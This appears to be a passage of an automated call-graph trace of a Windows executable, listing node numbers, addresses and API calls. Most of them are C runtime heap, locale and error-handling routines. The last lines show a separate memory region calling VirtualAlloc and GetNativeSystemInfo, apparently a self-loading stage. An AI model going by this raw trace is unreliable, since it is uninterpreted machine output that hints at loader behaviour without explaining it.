7ff8ca9b3ba2 9873->9879 9874->9784 9881 7ff8ca9b347c 9874->9881 9875->9873 9878 7ff8ca9b3024 free 45 API calls 9876->9878 9877->9873 9878->9874 9880 7ff8ca9b6550 __tzset 6 API calls 9879->9880 9880->9873 9882 7ff8ca9b3492 _cinit 9881->9882 10482 7ff8ca9b73f4 9882->10482 9884 7ff8ca9b34af _initterm_e 9886 7ff8ca9b34d2 _cinit 9884->9886 10485 7ff8ca9b73dc 9884->10485 9886->9784 9888 7ff8ca9b312d 9887->9888 9890 7ff8ca9b2237 9888->9890 9891 7ff8ca9b314b Sleep 9888->9891 10502 7ff8ca9b6cec 9888->10502 9890->9755 9890->9765 9891->9888 9891->9890 9892->9755 9895 7ff8ca9b3a59 9893->9895 9894 7ff8ca9b3aa8 9894->9780 9895->9894 9896 7ff8ca9b3a70 DeleteCriticalSection 9895->9896 9897 7ff8ca9b3024 free 45 API calls 9895->9897 9896->9895 9897->9895 9898->9755 9900 7ff8ca9b6ba0 _lock 45 API calls 9899->9900 9901 7ff8ca9b2d11 9900->9901 10511 7ff8ca9b6a80 LeaveCriticalSection 9901->10511 9909 7ff8ca9b3029 HeapFree 9908->9909 9913 7ff8ca9b3059 free 9908->9913 9910 7ff8ca9b3044 9909->9910 9909->9913 9911 7ff8ca9b67e0 _errno 43 API calls 9910->9911 9912 7ff8ca9b3049 GetLastError 9911->9912 9912->9913 9913->9755 9915 7ff8ca9b2f64 9914->9915 9916 7ff8ca9b2f88 9914->9916 9917 7ff8ca9b2f78 FlsSetValue 9915->9917 9918 7ff8ca9b2f69 FlsGetValue 9915->9918 9916->9755 10512 7ff8ca9b2e18 9917->10512 9918->9917 9929 7ff8ca9b2c5c EncodePointer 9920->9929 9922 7ff8ca9b36fb _initp_misc_winsig 9923 7ff8ca9b755c EncodePointer 9922->9923 9924 7ff8ca9b373e EncodePointer 9923->9924 9924->9799 9926 7ff8ca9b6993 9925->9926 9928 7ff8ca9b2fb0 9926->9928 9930 7ff8ca9b7ee4 InitializeCriticalSectionAndSpinCount 9926->9930 9928->9802 9928->9803 9931 7ff8ca9b7f11 9930->9931 9931->9926 9933 7ff8ca9b30b8 9932->9933 9935 7ff8ca9b30f0 9933->9935 9936 7ff8ca9b30d0 Sleep 9933->9936 9937 7ff8ca9b6c34 9933->9937 9935->9826 9935->9834 9936->9933 9936->9935 9938 7ff8ca9b6cc8 realloc 9937->9938 9946 7ff8ca9b6c4c realloc 9937->9946 9940 7ff8ca9b67e0 _errno 44 API calls 9938->9940 9939 7ff8ca9b6c84 RtlAllocateHeap 9941 7ff8ca9b6cbd 9939->9941 9939->9946 9940->9941 9941->9933 9943 7ff8ca9b6cad 9996 7ff8ca9b67e0 9943->9996 9946->9939 9946->9943 9947 7ff8ca9b6cb2 9946->9947 9948 7ff8ca9b6c64 9946->9948 9950 7ff8ca9b67e0 _errno 44 API calls 9947->9950 9948->9939 9951 7ff8ca9b7160 9948->9951 9960 7ff8ca9b6f0c 9948->9960 9993 7ff8ca9b334c 9948->9993 9950->9941 9999 7ff8ca9bd2ac 9951->9999 9954 7ff8ca9b717d 9956 7ff8ca9b6f0c _FF_MSGBANNER 45 API calls 9954->9956 9958 7ff8ca9b719e 9954->9958 9955 7ff8ca9bd2ac _FF_MSGBANNER 45 API calls 9955->9954 9957 7ff8ca9b7194 9956->9957 9959 7ff8ca9b6f0c _FF_MSGBANNER 45 API calls 9957->9959 9958->9948 9959->9958 9961 7ff8ca9b6f2f 9960->9961 9962 7ff8ca9bd2ac _FF_MSGBANNER 42 API calls 9961->9962 9992 7ff8ca9b70d4 9961->9992 9963 7ff8ca9b6f51 9962->9963 9964 7ff8ca9b70d6 GetStdHandle 9963->9964 9965 7ff8ca9bd2ac _FF_MSGBANNER 42 API calls 9963->9965 9966 7ff8ca9b70e9 __tzset 9964->9966 9964->9992 9967 7ff8ca9b6f64 9965->9967 9969 7ff8ca9b70ff WriteFile 9966->9969 9966->9992 9967->9964 9968 7ff8ca9b6f75 9967->9968 9968->9992 10018 7ff8ca9b7fbc 9968->10018 9969->9992 9972 7ff8ca9b6fb9 GetModuleFileNameA 9973 7ff8ca9b6fd9 9972->9973 9978 7ff8ca9b700a __tzset 9972->9978 9975 7ff8ca9b7fbc __tzset 42 API calls 9973->9975 9974 7ff8ca9b6550 __tzset 6 API calls 9974->9972 9976 7ff8ca9b6ff1 9975->9976 9976->9978 9980 7ff8ca9b6550 __tzset 6 API calls 9976->9980 9977 7ff8ca9b7065 10036 7ff8ca9bbdf4 9977->10036 9978->9977 10027 7ff8ca9bbf14 9978->10027 9980->9978 9982 7ff8ca9b7090 9985 7ff8ca9bbdf4 _FF_MSGBANNER 42 API calls 9982->9985 9984 7ff8ca9b6550 __tzset 6 API calls 9984->9982 9987 7ff8ca9b70a6 9985->9987 9988 7ff8ca9b70bf 9987->9988 9990 7ff8ca9b6550 __tzset 6 API calls 9987->9990 10045 7ff8ca9bd0b8 9988->10045 9989 7ff8ca9b6550 __tzset 6 API calls 9989->9977 9990->9988 9992->9948 10063 7ff8ca9b3310 GetModuleHandleW 9993->10063 10066 7ff8ca9b2d70 GetLastError FlsGetValue 9996->10066 9998 7ff8ca9b67e9 9998->9947 10000 7ff8ca9bd2b4 9999->10000 10001 7ff8ca9b67e0 _errno 45 API calls 10000->10001 10004 7ff8ca9b716e 10000->10004 10002 7ff8ca9bd2d9 10001->10002 10005 7ff8ca9b66d8 DecodePointer 10002->10005 10004->9954 10004->9955 10006 7ff8ca9b6723 _invalid_parameter_noinfo 10005->10006 10007 7ff8ca9b6709 10005->10007 10009 7ff8ca9b6550 10006->10009 10007->10004 10016 7ff8ca9b87a0 10009->10016 10011 7ff8ca9b6570 RtlCaptureContext 10013 7ff8ca9b65ad 10011->10013 10012 7ff8ca9b660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10014 7ff8ca9b6658 GetCurrentProcess TerminateProcess 10012->10014 10015 7ff8ca9b664c _invalid_parameter_noinfo 10012->10015 10013->10012 10014->10007 10015->10014 10017 7ff8ca9b87a9 10016->10017 10017->10011 10017->10017 10019 7ff8ca9b7fc7 10018->10019 10020 7ff8ca9b7fd1 10018->10020 10019->10020 10025 7ff8ca9b7ffd 10019->10025 10021 7ff8ca9b67e0 _errno 45 API calls 10020->10021 10022 7ff8ca9b7fd9 10021->10022 10023 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10022->10023 10024 7ff8ca9b6fa0 10023->10024 10024->9972 10024->9974 10025->10024 10026 7ff8ca9b67e0 _errno 45 API calls 10025->10026 10026->10022 10031 7ff8ca9bbf22 10027->10031 10028 7ff8ca9bbf27 10029 7ff8ca9b704c 10028->10029 10030 7ff8ca9b67e0 _errno 45 API calls 10028->10030 10029->9977 10029->9989 10032 7ff8ca9bbf51 10030->10032 10031->10028 10031->10029 10034 7ff8ca9bbf75 10031->10034 10033 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10032->10033 10033->10029 10034->10029 10035 7ff8ca9b67e0 _errno 45 API calls 10034->10035 10035->10032 10037 7ff8ca9bbe0c 10036->10037 10039 7ff8ca9bbe02 10036->10039 10038 7ff8ca9b67e0 _errno 45 API calls 10037->10038 10044 7ff8ca9bbe14 10038->10044 10039->10037 10041 7ff8ca9bbe50 10039->10041 10040 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10042 7ff8ca9b7077 10040->10042 10041->10042 10043 7ff8ca9b67e0 _errno 45 API calls 10041->10043 10042->9982 10042->9984 10043->10044 10044->10040 10062 7ff8ca9b2c5c EncodePointer 10045->10062 10064 7ff8ca9b333f ExitProcess 10063->10064 10065 7ff8ca9b332a GetProcAddress 10063->10065 10065->10064 10067 7ff8ca9b2d96 10066->10067 10068 7ff8ca9b2dde SetLastError 10066->10068 10069 7ff8ca9b3108 __wtomb_environ 40 API calls 10067->10069 10068->9998 10070 7ff8ca9b2da3 10069->10070 10070->10068 10071 7ff8ca9b2dab FlsSetValue 10070->10071 10072 7ff8ca9b2dc1 10071->10072 10073 7ff8ca9b2dd7 10071->10073 10074 7ff8ca9b2cbc _set_doserrno 40 API calls 10072->10074 10075 7ff8ca9b3024 free 40 API calls 10073->10075 10076 7ff8ca9b2dc8 GetCurrentThreadId 10074->10076 10077 7ff8ca9b2ddc 10075->10077 10076->10068 10077->10068 10079 7ff8ca9b4ed9 10078->10079 10080 7ff8ca9b4ee3 10078->10080 10082 7ff8ca9b4cd4 10079->10082 10080->9860 10106 7ff8ca9b2df4 10082->10106 10089 7ff8ca9b4e81 10089->10080 10090 7ff8ca9b309c __setargv 45 API calls 10091 7ff8ca9b4d24 __initmbctable 10090->10091 10091->10089 10129 7ff8ca9b4a0c 10091->10129 10094 7ff8ca9b4e83 10094->10089 10096 7ff8ca9b4e9c 10094->10096 10097 7ff8ca9b3024 free 45 API calls 10094->10097 10095 7ff8ca9b4d5f 10099 7ff8ca9b3024 free 45 API calls 10095->10099 10100 7ff8ca9b4d84 10095->10100 10098 7ff8ca9b67e0 _errno 45 API calls 10096->10098 10097->10096 10098->10089 10099->10100 10100->10089 10139 7ff8ca9b6ba0 10100->10139 10107 7ff8ca9b2d70 _set_doserrno 45 API calls 10106->10107 10108 7ff8ca9b2dff 10107->10108 10109 7ff8ca9b2e0f 10108->10109 10145 7ff8ca9b32e0 10108->10145 10111 7ff8ca9b48c0 10109->10111 10112 7ff8ca9b2df4 _getptd 45 API calls 10111->10112 10113 7ff8ca9b48cf 10112->10113 10114 7ff8ca9b48ea 10113->10114 10115 7ff8ca9b6ba0 _lock 45 API calls 10113->10115 10116 7ff8ca9b496e 10114->10116 10120 7ff8ca9b32e0 _getptd 45 API calls 10114->10120 10118 7ff8ca9b48fd 10115->10118 10122 7ff8ca9b497c 10116->10122 10117 7ff8ca9b4934 10150 7ff8ca9b6a80 LeaveCriticalSection 10117->10150 10118->10117 10121 7ff8ca9b3024 free 45 API calls 10118->10121 10120->10116 10121->10117 10151 7ff8ca9b2534 10122->10151 10125 7ff8ca9b49c1 10127 7ff8ca9b49ac 10125->10127 10128 7ff8ca9b49c6 GetACP 10125->10128 10126 7ff8ca9b499c GetOEMCP 10126->10127 10127->10089 10127->10090 10128->10127 10130 7ff8ca9b497c __initmbctable 47 API calls 10129->10130 10131 7ff8ca9b4a33 10130->10131 10132 7ff8ca9b4a3b __initmbctable 10131->10132 10133 7ff8ca9b4a8c IsValidCodePage 10131->10133 10138 7ff8ca9b4ab2 unexpected 10131->10138 10328 7ff8ca9b20e0 10132->10328 10133->10132 10135 7ff8ca9b4a9d GetCPInfo 10133->10135 10135->10132 10135->10138 10136 7ff8ca9b4c6f 10136->10094 10136->10095 10318 7ff8ca9b46dc GetCPInfo 10138->10318 10140 7ff8ca9b6bbe 10139->10140 10141 7ff8ca9b6bcf EnterCriticalSection 10139->10141 10456 7ff8ca9b6ab8 10140->10456 10144 7ff8ca9b32e0 _getptd 44 API calls 10144->10141 10146 7ff8ca9b7160 _FF_MSGBANNER 44 API calls 10145->10146 10147 7ff8ca9b32ed 10146->10147 10148 7ff8ca9b6f0c _FF_MSGBANNER 44 API calls 10147->10148 10149 7ff8ca9b32f4 DecodePointer 10148->10149 10152 7ff8ca9b254a 10151->10152 10158 7ff8ca9b25ae 10151->10158 10153 7ff8ca9b2df4 _getptd 45 API calls 10152->10153 10154 7ff8ca9b254f 10153->10154 10155 7ff8ca9b2587 10154->10155 10159 7ff8ca9b524c 10154->10159 10157 7ff8ca9b48c0 __initmbctable 45 API calls 10155->10157 10155->10158 10157->10158 10158->10125 10158->10126 10160 7ff8ca9b2df4 _getptd 45 API calls 10159->10160 10161 7ff8ca9b5257 10160->10161 10162 7ff8ca9b5280 10161->10162 10163 7ff8ca9b5272 10161->10163 10164 7ff8ca9b6ba0 _lock 45 API calls 10162->10164 10165 7ff8ca9b2df4 _getptd 45 API calls 10163->10165 10166 7ff8ca9b528a 10164->10166 10167 7ff8ca9b5277 10165->10167 10173 7ff8ca9b51f4 10166->10173 10171 7ff8ca9b52b8 10167->10171 10172 7ff8ca9b32e0 _getptd 45 API calls 10167->10172 10171->10155 10172->10171 10174 7ff8ca9b523e 10173->10174 10175 7ff8ca9b5202 ___lc_codepage_func 10173->10175 10177 7ff8ca9b6a80 LeaveCriticalSection 10174->10177 10175->10174 10178 7ff8ca9b4f04 10175->10178 10179 7ff8ca9b4f9b 10178->10179 10181 7ff8ca9b4f22 10178->10181 10180 7ff8ca9b4fee 10179->10180 10182 7ff8ca9b3024 free 45 API calls 10179->10182 10199 7ff8ca9b501b 10180->10199 10230 7ff8ca9b98a4 10180->10230 10181->10179 10184 7ff8ca9b4f61 10181->10184 10192 7ff8ca9b3024 free 45 API calls 10181->10192 10185 7ff8ca9b4fbf 10182->10185 10188 7ff8ca9b4f83 10184->10188 10198 7ff8ca9b3024 free 45 API calls 10184->10198 10187 7ff8ca9b3024 free 45 API calls 10185->10187 10193 7ff8ca9b4fd3 10187->10193 10190 7ff8ca9b3024 free 45 API calls 10188->10190 10189 7ff8ca9b5067 10194 7ff8ca9b4f8f 10190->10194 10191 7ff8ca9b3024 free 45 API calls 10191->10199 10195 7ff8ca9b4f55 10192->10195 10197 7ff8ca9b3024 free 45 API calls 10193->10197 10201 7ff8ca9b3024 free 45 API calls 10194->10201 10206 7ff8ca9b9df8 10195->10206 10196 7ff8ca9b3024 45 API calls free 10196->10199 10203 7ff8ca9b4fe2 10197->10203 10200 7ff8ca9b4f77 10198->10200 10199->10189 10199->10196 10222 7ff8ca9b9b68 10200->10222 10201->10179 10205 7ff8ca9b3024 free 45 API calls 10203->10205 10205->10180 10207 7ff8ca9b9e01 10206->10207 10208 7ff8ca9b9e87 10206->10208 10209 7ff8ca9b9e1b 10207->10209 10210 7ff8ca9b3024 free 45 API calls 10207->10210 10208->10184 10211 7ff8ca9b9e2d 10209->10211 10212 7ff8ca9b3024 free 45 API calls 10209->10212 10210->10209 10213 7ff8ca9b9e3f 10211->10213 10214 7ff8ca9b3024 free 45 API calls 10211->10214 10212->10211 10215 7ff8ca9b9e51 10213->10215 10216 7ff8ca9b3024 free 45 API calls 10213->10216 10214->10213 10217 7ff8ca9b9e63 10215->10217 10219 7ff8ca9b3024 free 45 API calls 10215->10219 10216->10215 10218 7ff8ca9b9e75 10217->10218 10220 7ff8ca9b3024 free 45 API calls 10217->10220 10218->10208 10221 7ff8ca9b3024 free 45 API calls 10218->10221 10219->10217 10220->10218 10221->10208 10223 7ff8ca9b9b6d 10222->10223 10228 7ff8ca9b9baa 10222->10228 10224 7ff8ca9b9b86 10223->10224 10225 7ff8ca9b3024 free 45 API calls 10223->10225 10226 7ff8ca9b9b98 10224->10226 10227 7ff8ca9b3024 free 45 API calls 10224->10227 10225->10224 10226->10228 10229 7ff8ca9b3024 free 45 API calls 10226->10229 10227->10226 10228->10188 10229->10228 10231 7ff8ca9b500f 10230->10231 10232 7ff8ca9b98ad 10230->10232 10231->10191 10233 7ff8ca9b3024 free 45 API calls 10232->10233 10234 7ff8ca9b98be 10233->10234 10235 7ff8ca9b3024 free 45 API calls 10234->10235 10236 7ff8ca9b98c7 10235->10236 10237 7ff8ca9b3024 free 45 API calls 10236->10237 10238 7ff8ca9b98d0 10237->10238 10239 7ff8ca9b3024 free 45 API calls 10238->10239 10240 7ff8ca9b98d9 10239->10240 10241 7ff8ca9b3024 free 45 API calls 10240->10241 10242 7ff8ca9b98e2 10241->10242 10243 7ff8ca9b3024 free 45 API calls 10242->10243 10244 7ff8ca9b98eb 10243->10244 10245 7ff8ca9b3024 free 45 API calls 10244->10245 10246 7ff8ca9b98f3 10245->10246 10247 7ff8ca9b3024 free 45 API calls 10246->10247 10248 7ff8ca9b98fc 10247->10248 10249 7ff8ca9b3024 free 45 API calls 10248->10249 10250 7ff8ca9b9905 10249->10250 10251 7ff8ca9b3024 free 45 API calls 10250->10251 10252 7ff8ca9b990e 10251->10252 10253 7ff8ca9b3024 free 45 API calls 10252->10253 10254 7ff8ca9b9917 10253->10254 10255 7ff8ca9b3024 free 45 API calls 10254->10255 10256 7ff8ca9b9920 10255->10256 10257 7ff8ca9b3024 free 45 API calls 10256->10257 10258 7ff8ca9b9929 10257->10258 10259 7ff8ca9b3024 free 45 API calls 10258->10259 10260 7ff8ca9b9932 10259->10260 10261 7ff8ca9b3024 free 45 API calls 10260->10261 10262 7ff8ca9b993b 10261->10262 10263 7ff8ca9b3024 free 45 API calls 10262->10263 10264 7ff8ca9b9944 10263->10264 10265 7ff8ca9b3024 free 45 API calls 10264->10265 10266 7ff8ca9b9950 10265->10266 10267 7ff8ca9b3024 free 45 API calls 10266->10267 10268 7ff8ca9b995c 10267->10268 10269 7ff8ca9b3024 free 45 API calls 10268->10269 10270 7ff8ca9b9968 10269->10270 10271 7ff8ca9b3024 free 45 API calls 10270->10271 10272 7ff8ca9b9974 10271->10272 10273 7ff8ca9b3024 free 45 API calls 10272->10273 10274 7ff8ca9b9980 10273->10274 10275 7ff8ca9b3024 free 45 API calls 10274->10275 10276 7ff8ca9b998c 10275->10276 10277 7ff8ca9b3024 free 45 API calls 10276->10277 10278 7ff8ca9b9998 10277->10278 10279 7ff8ca9b3024 free 45 API calls 10278->10279 10280 7ff8ca9b99a4 10279->10280 10281 7ff8ca9b3024 free 45 API calls 10280->10281 10282 7ff8ca9b99b0 10281->10282 10283 7ff8ca9b3024 free 45 API calls 10282->10283 10284 7ff8ca9b99bc 10283->10284 10285 7ff8ca9b3024 free 45 API calls 10284->10285 10286 7ff8ca9b99c8 10285->10286 10287 7ff8ca9b3024 free 45 API calls 10286->10287 10288 7ff8ca9b99d4 10287->10288 10289 7ff8ca9b3024 free 45 API calls 10288->10289 10290 7ff8ca9b99e0 10289->10290 10291 7ff8ca9b3024 free 45 API calls 10290->10291 10292 7ff8ca9b99ec 10291->10292 10293 7ff8ca9b3024 free 45 API calls 10292->10293 10294 7ff8ca9b99f8 10293->10294 10295 7ff8ca9b3024 free 45 API calls 10294->10295 10296 7ff8ca9b9a04 10295->10296 10297 7ff8ca9b3024 free 45 API calls 10296->10297 10298 7ff8ca9b9a10 10297->10298 10299 7ff8ca9b3024 free 45 API calls 10298->10299 10300 7ff8ca9b9a1c 10299->10300 10301 7ff8ca9b3024 free 45 API calls 10300->10301 10302 7ff8ca9b9a28 10301->10302 10303 7ff8ca9b3024 free 45 API calls 10302->10303 10304 7ff8ca9b9a34 10303->10304 10305 7ff8ca9b3024 free 45 API calls 10304->10305 10306 7ff8ca9b9a40 10305->10306 10307 7ff8ca9b3024 free 45 API calls 10306->10307 10308 7ff8ca9b9a4c 10307->10308 10309 7ff8ca9b3024 free 45 API calls 10308->10309 10310 7ff8ca9b9a58 10309->10310 10311 7ff8ca9b3024 free 45 API calls 10310->10311 10312 7ff8ca9b9a64 10311->10312 10313 7ff8ca9b3024 free 45 API calls 10312->10313 10314 7ff8ca9b9a70 10313->10314 10315 7ff8ca9b3024 free 45 API calls 10314->10315 10316 7ff8ca9b9a7c 10315->10316 10317 7ff8ca9b3024 free 45 API calls 10316->10317 10317->10231 10319 7ff8ca9b480a 10318->10319 10320 7ff8ca9b471e unexpected 10318->10320 10322 7ff8ca9b20e0 __initmbctable 8 API calls 10319->10322 10339 7ff8ca9b91a0 10320->10339 10324 7ff8ca9b48aa 10322->10324 10324->10132 10327 7ff8ca9b8e9c __initmbctable 78 API calls 10327->10319 10329 7ff8ca9b20e9 10328->10329 10330 7ff8ca9b20f4 10329->10330 10331 7ff8ca9b23e8 RtlCaptureContext RtlLookupFunctionEntry 10329->10331 10330->10136 10332 7ff8ca9b242c RtlVirtualUnwind 10331->10332 10333 7ff8ca9b246d 10331->10333 10334 7ff8ca9b248f IsDebuggerPresent 10332->10334 10333->10334 10455 7ff8ca9b460c 10334->10455 10336 7ff8ca9b24ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10337 7ff8ca9b2516 GetCurrentProcess TerminateProcess 10336->10337 10338 7ff8ca9b250c _invalid_parameter_noinfo 10336->10338 10337->10136 10338->10337 10340 7ff8ca9b2534 _wcstoui64 45 API calls 10339->10340 10341 7ff8ca9b91c4 10340->10341 10349 7ff8ca9b8f34 10341->10349 10344 7ff8ca9b8e9c 10345 7ff8ca9b2534 _wcstoui64 45 API calls 10344->10345 10346 7ff8ca9b8ec0 10345->10346 10408 7ff8ca9b895c 10346->10408 10350 7ff8ca9b8f84 GetStringTypeW 10349->10350 10352 7ff8ca9b8fc1 10349->10352 10351 7ff8ca9b8fa6 GetLastError 10350->10351 10353 7ff8ca9b8f9e 10350->10353 10351->10352 10352->10353 10354 7ff8ca9b90f0 10352->10354 10355 7ff8ca9b90e9 10353->10355 10356 7ff8ca9b8fea MultiByteToWideChar 10353->10356 10373 7ff8ca9be1e8 GetLocaleInfoA 10354->10373 10359 7ff8ca9b20e0 __initmbctable 8 API calls 10355->10359 10356->10355 10362 7ff8ca9b9018 10356->10362 10360 7ff8ca9b47a1 10359->10360 10360->10344 10361 7ff8ca9b914b GetStringTypeA 10361->10355 10364 7ff8ca9b916e 10361->10364 10365 7ff8ca9b6c34 realloc 45 API calls 10362->10365 10368 7ff8ca9b903d unexpected wcsftime 10362->10368 10369 7ff8ca9b3024 free 45 API calls 10364->10369 10365->10368 10366 7ff8ca9b90a4 MultiByteToWideChar 10370 7ff8ca9b90c6 GetStringTypeW 10366->10370 10371 7ff8ca9b90db 10366->10371 10368->10355 10368->10366 10369->10355 10370->10371 10371->10355 10372 7ff8ca9b3024 free 45 API calls 10371->10372 10372->10355 10374 7ff8ca9be21a 10373->10374 10375 7ff8ca9be21f 10373->10375 10377 7ff8ca9b20e0 __initmbctable 8 API calls 10374->10377 10404 7ff8ca9b2100 10375->10404 10378 7ff8ca9b911a 10377->10378 10378->10355 10378->10361 10379 7ff8ca9be23c 10378->10379 10380 7ff8ca9be366 10379->10380 10381 7ff8ca9be28e GetCPInfo 10379->10381 10384 7ff8ca9b20e0 __initmbctable 8 API calls 10380->10384 10382 7ff8ca9be2a0 10381->10382 10383 7ff8ca9be33f MultiByteToWideChar 10381->10383 10382->10383 10385 7ff8ca9be2aa GetCPInfo 10382->10385 10383->10380 10388 7ff8ca9be2c5 __tzset 10383->10388 10386 7ff8ca9b9140 10384->10386 10385->10383 10387 7ff8ca9be2bf 10385->10387 10386->10355 10386->10361 10387->10383 10387->10388 10389 7ff8ca9be301 unexpected wcsftime 10388->10389 10390 7ff8ca9b6c34 realloc 45 API calls 10388->10390 10389->10380 10391 7ff8ca9be39d MultiByteToWideChar 10389->10391 10390->10389 10392 7ff8ca9be3c7 10391->10392 10396 7ff8ca9be3ff 10391->10396 10393 7ff8ca9be407 10392->10393 10394 7ff8ca9be3cc WideCharToMultiByte 10392->10394 10397 7ff8ca9be439 10393->10397 10398 7ff8ca9be40d WideCharToMultiByte 10393->10398 10394->10396 10395 7ff8ca9b3024 free 45 API calls 10395->10380 10396->10380 10396->10395 10399 7ff8ca9b3108 __wtomb_environ 45 API calls 10397->10399 10398->10396 10398->10397 10400 7ff8ca9be446 10399->10400 10400->10396 10401 7ff8ca9be44e WideCharToMultiByte 10400->10401 10401->10396 10402 7ff8ca9be477 10401->10402 10403 7ff8ca9b3024 free 45 API calls 10402->10403 10403->10396 10405 7ff8ca9b287c 10404->10405 10406 7ff8ca9b25f8 _wcstoui64 67 API calls 10405->10406 10407 7ff8ca9b28a7 10406->10407 10407->10374 10409 7ff8ca9b89b4 LCMapStringW 10408->10409 10412 7ff8ca9b89d8 10408->10412 10410 7ff8ca9b89e4 GetLastError 10409->10410 10409->10412 10410->10412 10411 7ff8ca9b8ca6 10416 7ff8ca9be1e8 _wcstoui64 67 API calls 10411->10416 10412->10411 10413 7ff8ca9b8a53 10412->10413 10414 7ff8ca9b8c9f 10413->10414 10415 7ff8ca9b8a71 MultiByteToWideChar 10413->10415 10417 7ff8ca9b20e0 __initmbctable 8 API calls 10414->10417 10415->10414 10425 7ff8ca9b8aa0 10415->10425 10418 7ff8ca9b8cd4 10416->10418 10419 7ff8ca9b47d4 10417->10419 10418->10414 10421 7ff8ca9b8cf3 10418->10421 10422 7ff8ca9b8e2f LCMapStringA 10418->10422 10419->10327 10420 7ff8ca9b8b1c MultiByteToWideChar 10423 7ff8ca9b8c91 10420->10423 10424 7ff8ca9b8b46 LCMapStringW 10420->10424 10426 7ff8ca9be23c _wcstoui64 60 API calls 10421->10426 10437 7ff8ca9b8d3b 10422->10437 10423->10414 10433 7ff8ca9b3024 free 45 API calls 10423->10433 10424->10423 10427 7ff8ca9b8b70 10424->10427 10428 7ff8ca9b8ad1 wcsftime 10425->10428 10429 7ff8ca9b6c34 realloc 45 API calls 10425->10429 10430 7ff8ca9b8d0b 10426->10430 10434 7ff8ca9b8b7b 10427->10434 10440 7ff8ca9b8bb6 10427->10440 10428->10414 10428->10420 10429->10428 10430->10414 10431 7ff8ca9b8d13 LCMapStringA 10430->10431 10431->10437 10442 7ff8ca9b8d42 10431->10442 10432 7ff8ca9b8e5f 10432->10414 10438 7ff8ca9b3024 free 45 API calls 10432->10438 10433->10414 10434->10423 10436 7ff8ca9b8b92 LCMapStringW 10434->10436 10435 7ff8ca9b3024 free 45 API calls 10435->10432 10436->10423 10437->10432 10437->10435 10438->10414 10439 7ff8ca9b8c23 LCMapStringW 10443 7ff8ca9b8c83 10439->10443 10444 7ff8ca9b8c44 WideCharToMultiByte 10439->10444 10441 7ff8ca9b6c34 realloc 45 API calls 10440->10441 10448 7ff8ca9b8bd4 wcsftime 10440->10448 10441->10448 10446 7ff8ca9b8d63 unexpected wcsftime 10442->10446 10447 7ff8ca9b6c34 realloc 45 API calls 10442->10447 10443->10423 10452 7ff8ca9b3024 free 45 API calls 10443->10452 10444->10443 10445 7ff8ca9b8dc5 LCMapStringA 10449 7ff8ca9b8df1 10445->10449 10450 7ff8ca9b8ded 10445->10450 10446->10437 10446->10445 10447->10446 10448->10423 10448->10439 10453 7ff8ca9be23c _wcstoui64 60 API calls 10449->10453 10450->10437 10454 7ff8ca9b3024 free 45 API calls 10450->10454 10452->10423 10453->10450 10454->10437 10455->10336 10457 7ff8ca9b6af6 10456->10457 10458 7ff8ca9b6adf 10456->10458 10461 7ff8ca9b309c __setargv 44 API calls 10457->10461 10470 7ff8ca9b6b0b 10457->10470 10459 7ff8ca9b7160 _FF_MSGBANNER 44 API calls 10458->10459 10460 7ff8ca9b6ae4 10459->10460 10462 7ff8ca9b6f0c _FF_MSGBANNER 44 API calls 10460->10462 10463 7ff8ca9b6b19 10461->10463 10464 7ff8ca9b6aec 10462->10464 10465 7ff8ca9b6b30 10463->10465 10466 7ff8ca9b6b21 10463->10466 10467 7ff8ca9b334c realloc 3 API calls 10464->10467 10469 7ff8ca9b6ba0 _lock 44 API calls 10465->10469 10468 7ff8ca9b67e0 _errno 44 API calls 10466->10468 10467->10457 10468->10470 10471 7ff8ca9b6b3a 10469->10471 10470->10141 10470->10144 10472 7ff8ca9b6b72 10471->10472 10473 7ff8ca9b6b43 10471->10473 10475 7ff8ca9b3024 free 44 API calls 10472->10475 10474 7ff8ca9b7ee4 _lock InitializeCriticalSectionAndSpinCount 10473->10474 10476 7ff8ca9b6b50 10474->10476 10477 7ff8ca9b6b61 LeaveCriticalSection 10475->10477 10476->10477 10479 7ff8ca9b3024 free 44 API calls 10476->10479 10477->10470 10480 7ff8ca9b6b5c 10479->10480 10481 7ff8ca9b67e0 _errno 44 API calls 10480->10481 10481->10477 10483 7ff8ca9b740a EncodePointer 10482->10483 10483->10483 10484 7ff8ca9b741f 10483->10484 10484->9884 10488 7ff8ca9b72d4 10485->10488 10501 7ff8ca9b3364 10488->10501 10503 7ff8ca9b6d01 10502->10503 10509 7ff8ca9b6d33 realloc 10502->10509 10504 7ff8ca9b6d0f 10503->10504 10503->10509 10505 7ff8ca9b67e0 _errno 44 API calls 10504->10505 10507 7ff8ca9b6d14 10505->10507 10506 7ff8ca9b6d4b RtlAllocateHeap 10508 7ff8ca9b6d2f 10506->10508 10506->10509 10510 7ff8ca9b66d8 _invalid_parameter_noinfo 7 API calls 10507->10510 10508->9888 10509->10506 10509->10508 10510->10508 10513 7ff8ca9b2e21 10512->10513 10514 7ff8ca9b2f42 10512->10514 10515 7ff8ca9b2e3c 10513->10515 10516 7ff8ca9b3024 free 45 API calls 10513->10516 10514->9916 10517 7ff8ca9b2e4a 10515->10517 10519 7ff8ca9b3024 free 45 API calls 10515->10519 10516->10515 10518 7ff8ca9b2e58 10517->10518 10520 7ff8ca9b3024 free 45 API calls 10517->10520 10521 7ff8ca9b2e66 10518->10521 10522 7ff8ca9b3024 free 45 API calls 10518->10522 10519->10517 10520->10518 10523 7ff8ca9b2e74 10521->10523 10524 7ff8ca9b3024 free 45 API calls 10521->10524 10522->10521 10525 7ff8ca9b2e82 10523->10525 10526 7ff8ca9b3024 free 45 API calls 10523->10526 10524->10523 10527 7ff8ca9b2e93 10525->10527 10528 7ff8ca9b3024 free 45 API calls 10525->10528 10526->10525 10529 7ff8ca9b2eab 10527->10529 10530 7ff8ca9b3024 free 45 API calls 10527->10530 10528->10527 10531 7ff8ca9b6ba0 _lock 45 API calls 10529->10531 10530->10529 10534 7ff8ca9b2eb5 10531->10534 10532 7ff8ca9b2ee3 10544 7ff8ca9b6a80 LeaveCriticalSection 10532->10544 10534->10532 10536 7ff8ca9b3024 free 45 API calls 10534->10536 10536->10532 10545 7ff8ca9b2050 10548 7ff8ca971000 10545->10548 10549 7ff8ca97101e ExitProcess 10548->10549 9720 640000 9721 640183 9720->9721 9722 64043e VirtualAlloc 9721->9722 9725 640462 9722->9725 9723 640531 GetNativeSystemInfo 9724 64056d VirtualAlloc 9723->9724 9727 640a7b 9723->9727 9726 64058b 9724->9726 